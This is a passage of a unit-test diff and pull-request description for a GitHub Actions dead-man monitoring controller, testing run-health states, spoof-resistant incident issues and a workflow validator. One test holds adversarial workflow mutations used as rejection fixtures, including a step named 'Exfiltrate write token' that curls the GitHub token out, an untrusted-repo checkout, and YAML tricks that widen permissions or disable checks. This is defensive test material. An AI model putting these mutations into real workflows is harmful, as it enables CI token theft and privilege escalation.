         self.assertTrue(observed.healthy)
         self.assertEqual(observed.state, "RUNNING")
+
+    def test_active_run_cannot_conceal_newer_failed_completed_baseline(self) -> None:
+        observed = self.observe(
+            [
+                run(
+                    run_id=13,
+                    status="in_progress",
+                    conclusion=None,
+                    created_minutes_ago=2,
+                ),
+                run(
+                    run_id=12,
+                    status="completed",
+                    conclusion="failure",
+                    created_minutes_ago=5,
+                    completed_minutes_ago=4,
+                ),
+                run(
+                    run_id=11,
+                    status="completed",
+                    conclusion="success",
+                    created_minutes_ago=10,
+                    completed_minutes_ago=9,
+                ),
+            ]
+        )
+        self.assertFalse(observed.healthy)
+        self.assertEqual(observed.state, "ACTIVE_WITH_FAILED_BASELINE")
 
     def test_old_active_run_is_stuck(self) -> None:
         observed = self.observe(
@@ -326,30 +526,323 @@ class ApiRouteTests(unittest.TestCase):
             "a" * 40,
         )
 
+    class IncidentApi(GitHubApi):
+        def __init__(self, items: list[dict[str, Any]], *, incomplete: bool = False):
+            self.token = "suppressed"
+            self.timeout = 1
+            self.items = items
+            self.incomplete = incomplete
+
+        def request(
+            self,
+            method: str,
+            path: str,
+            payload: Mapping[str, Any] | None = None,
+        ) -> Any:
+            if path.startswith("/search/issues?"):
+                self.assert_request(method, path, payload)
+                return {
+                    "total_count": len(self.items),
+                    "incomplete_results": self.incomplete,
+                    "items": self.items,
+                }
+            if path == ("/repos/szl-holdings/.github/actions/runs/987654/attempts/1"):
+                return {
+                    "id": 987654,
+                    "run_attempt": 1,
+                    "event": "schedule",
+                    "path": ".github/workflows/estate-deadman.yml",
+                    "head_branch": "main",
+                    "head_sha": "a" * 40,
+                    "status": "completed",
+                    "conclusion": "failure",
+                    "created_at": stamp(2),
+                    "run_started_at": stamp(2),
+                    "updated_at": stamp(-1),
+                    "repository": {"full_name": "szl-holdings/.github"},
+                    "head_repository": {"full_name": "szl-holdings/.github"},
+                }
+            raise AssertionError((method, path, payload))
+
+        @staticmethod
+        def assert_request(
+            method: str, path: str, payload: Mapping[str, Any] | None
+        ) -> None:
+            if method != "GET" or not path.startswith("/search/issues?"):
+                raise AssertionError((method, path, payload))
+
+    @staticmethod
+    def incident_item(*, login: str = "github-actions[bot]") -> dict[str, Any]:
+        return {
+            "number": 42,
+            "title": "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
+            "body": issue_body(report()),
+            "updated_at": stamp(0),
+            "user": {
+                "login": login,
+                "type": "Bot" if login == "github-actions[bot]" else "User",
+            },
+        }
+
+    def test_public_exact_title_spoof_cannot_own_the_controller_incident(self) -> None:
+        api = self.IncidentApi([self.incident_item(login="untrusted-user")])
+        self.assertIsNone(
+            api.find_incident(
+                "szl-holdings/.github",
+                "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
+            )
+        )
+
+    def test_controller_incident_requires_bot_author_and_bound_state(self) -> None:
+        api = self.IncidentApi([self.incident_item()])
+        incident = api.find_incident(
+            "szl-holdings/.github",
+            "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
+        )
+        self.assertIsNotNone(incident)
+        assert incident is not None
+        self.assertEqual(
+            incident["_controller_state"]["controller_repository"],
+            "szl-holdings/.github",
+        )
+        self.assertEqual(incident["_referenced_run_authenticated_at"], stamp(0))
+
+    def test_controller_incident_rejects_wrong_immutable_attempt(self) -> None:
+        item = self.incident_item()
+        body = item["body"].replace(
+            '"controller_run_attempt":1', '"controller_run_attempt":2'
+        )
+        item["body"] = body
+        api = self.IncidentApi([item])
+        with self.assertRaises(AssertionError):
+            api.find_incident(
+                "szl-holdings/.github",
+                "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
+            )
+
+    def test_controller_incident_rejects_future_marker_outside_attempt(self) -> None:
+        item = self.incident_item()
+        item["body"] = issue_body(report(generated_at=stamp(-10)))
+        api = self.IncidentApi([item])
+        with self.assertRaises(ContractError):
+            api.find_incident(
+                "szl-holdings/.github",
+                "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
+            )
+
+    def test_duplicate_controller_incidents_fail_closed(self) -> None:
+        api = self.IncidentApi([self.incident_item(), self.incident_item()])
+        with self.assertRaises(ContractError):
+            api.find_incident(
+                "szl-holdings/.github",
+                "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
+            )
+
+    def test_incomplete_incident_search_fails_closed(self) -> None:
+        api = self.IncidentApi([], incomplete=True)
+        with self.assertRaises(ContractError):
+            api.find_incident(
+                "szl-holdings/.github",
+                "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
+            )
+
 
 class IncidentContractTests(unittest.TestCase):
     def test_issue_body_contains_only_bounded_evidence(self) -> None:
-        report = {
-            "generated_at": stamp(0),
-            "evidence_sha256": "b" * 64,
-            "final_sample": [
-                {
-                    "id": "autonomic-public-estate-sre",
-                    "healthy": False,
-                    "state": "LATEST_RUN_FAILED",
-                    "latest_run_id": 123,
-                    "latest_conclusion": "failure",
-                    "success_age_minutes": 7,
-                    "reason": "latest completed scheduled run did not succeed",
-                }
-            ],
-        }
-        body = issue_body(report)
+        receipt = report()
+        receipt["final_sample"] = [
+            {
+                "id": "autonomic-public-estate-sre",
+                "healthy": False,
+                "state": "LATEST_RUN_FAILED",
+                "latest_run_id": 123,
+                "latest_conclusion": "failure",
+                "success_age_minutes": 7,
+                "reason": "latest completed scheduled run did not succeed",
+            }
+        ]
+        body = issue_body(receipt)
         self.assertIn("Two independent samples", body)
         self.assertIn("LATEST_RUN_FAILED", body)
         self.assertIn("SZL_ESTATE_DEADMAN_STATE_BEGIN", body)
         self.assertNotIn("password", body.lower())
         self.assertNotIn("authorization", body.lower())
+        state = parse_incident_state(body, "szl-holdings/.github")
+        self.assertEqual(state["controller_revision"], "a" * 40)
+
+    def test_confirmed_failure_refreshes_marker_consistent_incident_every_cycle(
+        self,
+    ) -> None:
+        class ReconcileApi:
+            def __init__(self) -> None:
+                self.updated = False
+                self.body: str | None = None
+
+            def find_incident(self, repository: str, title: str) -> dict[str, Any]:
+                body = issue_body(report(generated_at=stamp(120)))
+                return {
+                    "number": 42,
+                    "updated_at": stamp(1),
+                    "_controller_state": parse_incident_state(body, repository),
+                    "_referenced_run_authenticated_at": stamp(120),
+                }
+
+            def update_issue(
+                self,
+                repository: str,
+                number: int,
+                *,
+                body: str | None = None,
+                state: str | None = None,
+            ) -> dict[str, Any]:
+                self.updated = True
+                self.body = body
+                return {"number": number}
+
+            def issue(self, repository: str, number: int) -> dict[str, Any]:
+                return {
+                    "number": number,
+                    "title": "[ESTATE-DEADMAN] Critical scheduled control plane degraded",
+                    "state": "open",
+                    "body": self.body,
+                }
+
+        api = ReconcileApi()
+        result = reconcile_incident(api, policy(), report(), NOW)
+        self.assertEqual(result["action"], "refreshed")
+        self.assertTrue(api.updated)
+
+    def test_workflow_permissions_are_exact_and_structural(self) -> None:
+        source = (ROOT / ".github" / "workflows" / "estate-deadman.yml").read_text(
+            encoding="utf-8"
+        )
+        result = validate_workflow_source(source)
+        self.assertEqual(
+            result["permissions"],
+            {"actions": "read", "contents": "read", "issues": "write"},
+        )
+        attacks = (
+            source.replace("  issues: write\n", "  issues: write\n  id-token: write\n"),
+            source.replace("  issues: write", "  issues: read\n  # issues: write"),
+            source.replace(
+                "  supervise:\n",
+                "  supervise:\n    permissions: write-all\n",
+            ),
+            source.replace(
+                "  supervise:\n",
+                '  supervise:\n    "permis\\u0073ions": write-all\n',
+            ),
+            source.replace(
+                "  supervise:\n",
+                "  supervise:\n    ? permissions\n    : write-all\n",
+            ),
+            source.replace(
+                "  supervise:\n",
+                "  supervise:\n    !!str permissions: write-all\n",
+            ),
+            source.replace(
+                "  supervise:\n    name: Observe, confirm, incident, and attest\n",
+                "  supervise:\n    &p permissions: write-all\n    name:\n      *p\n",
+            ),
+            source.replace(
+                "jobs:\n",
+                "x-authority: &widened\n  permissions: write-all\n\njobs:\n",
+            ).replace(
+                "  supervise:\n",
+                "  supervise:\n    <<: *widened\n",
+            ),
+            source.replace(
+                '    - cron: "7,22,37,52 * * * *"',
+                '    - cron: "0 0 1 1 *"\n    # cron: "7,22,37,52 * * * *"',
+            ),
+            source.replace(
+                "  supervise:\n",
+                '  supervise:\n    "permissions": {contents: "write", issues: "write", id-token: "write"}\n',
+            ),
+            source.replace(
+                "  supervise:\n",
+                "  supervise:\n    permissions:\n      statuses: write\n",
+            ),
+            source.replace(
+                "      - name: Set up Python\n",
+                "      - name: Attacker checkout\n"
+                "        uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1\n"
+                "        with:\n"
+                "          repository: untrusted/example\n"
+                "          ref: refs/heads/main\n\n"
+                "      - name: Set up Python\n",
+            ),
+            source.replace(
+                "      - name: Set up Python\n",
+                "      - name: Exfiltrate write token\n"
+                "        env:\n"
+                "          TOKEN: ${{ github.token }}\n"
+                '        run: curl -X POST -H "Authorization: Bearer $TOKEN" https://api.github.com/repos/example/issues\n\n'
+                "      - name: Set up Python\n",
+            ),
+            source.replace(
+                "          ref: ${{ github.sha }}",
+                "          repository: untrusted/example\n"
+                "          ref: refs/heads/attacker\n"
+                "          # ref: ${{ github.sha }}",
+            ),
+            source.replace(
+                '          repositories: ".github,szl-org-health,a11oy"',
+                '          repositories: ".github,szl-org-health,a11oy,attacker"',
+            ),
+            source.replace(
+                "          permission-actions: read",
+                "          permission-actions: write",
+            ),
+            source.replace(
+                "          ESTATE_READ_TOKEN: ${{ steps.reader.outputs.token }}",
+                "          ESTATE_READ_TOKEN: ${{ github.token }}",
+            ),
+            source.replace(
+                "      - name: Require exact schedule authority\n",
+                "      - name: Require exact schedule authority\n        if: false\n",
+            ),
+            source.replace(
+                "      - name: Require exact schedule authority\n",
+                '      - name: Require exact schedule authority\n        "i\\u0066": false\n',
+            ),
+            source.replace(
+                "      - name: Re-prove dead-man contracts before live observation\n"
+                "        env:\n"
+                '          PYTHONDONTWRITEBYTECODE: "1"\n'
+                "        run: |",
+                "      - name: Re-prove dead-man contracts before live observation\n"
+                "        env:\n"
+                '          PYTHONDONTWRITEBYTECODE: "1"\n'
+                "        run: true\n"
+                "        # run: |",
+            ),
+            source.replace(
+                '          test "$(git status --porcelain --untracked-files=all)" = ""',
+                '          # test "$(git status --porcelain --untracked-files=all)" = ""',
+            ),
+            source.replace(
+                "      - name: Require a confirmed healthy control plane\n",
+                "      - name: Require a confirmed healthy control plane\n        continue-on-error: true\n",
+            ),
+            source.replace(
+                "      - name: Require a confirmed healthy control plane\n",
+                '      - name: Require a confirmed healthy control plane\n        "continue-on-err\\u006fr": true\n',
+            ),
+            source.replace(
+                "          jq -e '.confirmed_healthy == true' reports/estate-deadman.json >/dev/null",
+                "          true\n          # jq -e '.confirmed_healthy == true' reports/estate-deadman.json >/dev/null",
+            ),
+            source.replace(
+                '          test "$(git rev-parse HEAD)" = "$GITHUB_SHA"',
+                '          # test "$(git rev-parse HEAD)" = "$GITHUB_SHA"',
+            ),
+        )
+        for attack_index, attack in enumerate(attacks):
+            self.assertNotEqual(attack, source, f"attack {attack_index} was a no-op")
+            with self.subTest(attack_index=attack_index, attack=attack[:120]):
+                with self.assertRaises(WorkflowContractError):
+                    validate_workflow_source(attack)
 
     def test_module_has_no_dynamic_execution_or_subprocess(self) -> None:
         source = MODULE_PATH.read_text(encoding="utf-8")
@@ -365,6 +858,34 @@ class IncidentContractTests(unittest.TestCase):
         self.assertNotIn("restart_space", source)
         self.assertNotIn("/git/refs", source)
         self.assertNotIn("/deployments", source)
+
+    def test_main_reports_secondary_receipt_write_failure_without_messages(
+        self,
+    ) -> None:
+        stderr = io.StringIO()
+        with (
+            patch.object(
+                estate_deadman,
+                "load_policy",
+                side_effect=RuntimeError("primary-secret-message"),
+            ),
+            patch.object(
+                estate_deadman,
+                "write_json_atomic",
+                side_effect=OSError("secondary-secret-message"),
+            ),
+            redirect_stderr(stderr),
+        ):
+            result = estate_deadman.main(
+                ["--policy", "ignored.json", "--output", "blocked.json"]
+            )
+
+        rendered = stderr.getvalue()
+        self.assertEqual(result, 1)
+        self.assertIn('"error_kind": "RUNTIMEERROR"', rendered)
+        self.assertIn('"failure_write_error_kind": "OSERROR"', rendered)
+        self.assertNotIn("primary-secret-message", rendered)
+        self.assertNotIn("secondary-secret-message", rendered)
 
 
 if __name__ == "__main__":


### PR DESCRIPTION
## Outcome

Post-merge successor to #645 that makes the estate dead-man controller fail closed at the workflow-authority, observation, incident, receipt, and organization App-token inventory boundaries.

## Exact source boundary

- protected base at construction: `e1383befb355612dafc20b7a31a001b88e5ddf98`
- exact signed + DCO head: `892c2f67d73121db201f919d1855f91e866a39aa`
- scope: nine controller, workflow, policy, governance, documentation, and test files

## Material repairs

- requires the same failed target in two independent samples; mixed observations are `INCONCLUSIVE`
- validates immutable schedule `created_at` freshness and completed-run `updated_at` without trusting malformed rows
- binds incident markers to an authenticated immutable workflow attempt and exact controller tip, while avoiding a false causal-authorship claim
- revalidates exact controller tip immediately before issue mutation and verifies exact issue readback
- isolates the cross-repository read token from the built-in incident-write token
- validates the entire workflow byte envelope against a pinned SHA-256 and rejects advanced YAML authority tricks
- hashes the exact emitted receipt bytes and verifies the sidecar in the terminal gate
- rejects duplicate policy keys, lone CR bytes, and non-canonical policy inputs
- binds the new App-token mint into the fail-closed FORGE-9 least-privilege inventory and keeps repository path identity portable across Linux and Windows

## Validation

- deadman contracts: 36/36 pass
- App-token/code-security contracts: 22/22 pass
- workflow authority validator passes at workflow SHA-256 `f3c14a6730617569892f56a76660babb05ab7a52c43349f6d9355d3c84d3607e`
- FORGE-9 bootstrap, `gate/adversarial`, and `gate/verify-all` pass locally
- actionlint v1.7.12 passes on both workflows
- diff check passes
- independent exact-head security/logic reviews found no actionable P0-P2 issue in either commit

## Truth boundary

This PR proves source construction and local contract validation only. It does **not** claim that the QILLQAQ App installation grants the requested narrow repository permissions, that a scheduled provider run has succeeded, or that a live incident lifecycle has converged. Keep the PR draft until exact-head hosted checks and review are terminal. After a normal protected merge, operational status still requires a real scheduled run plus immutable receipt/readback evidence.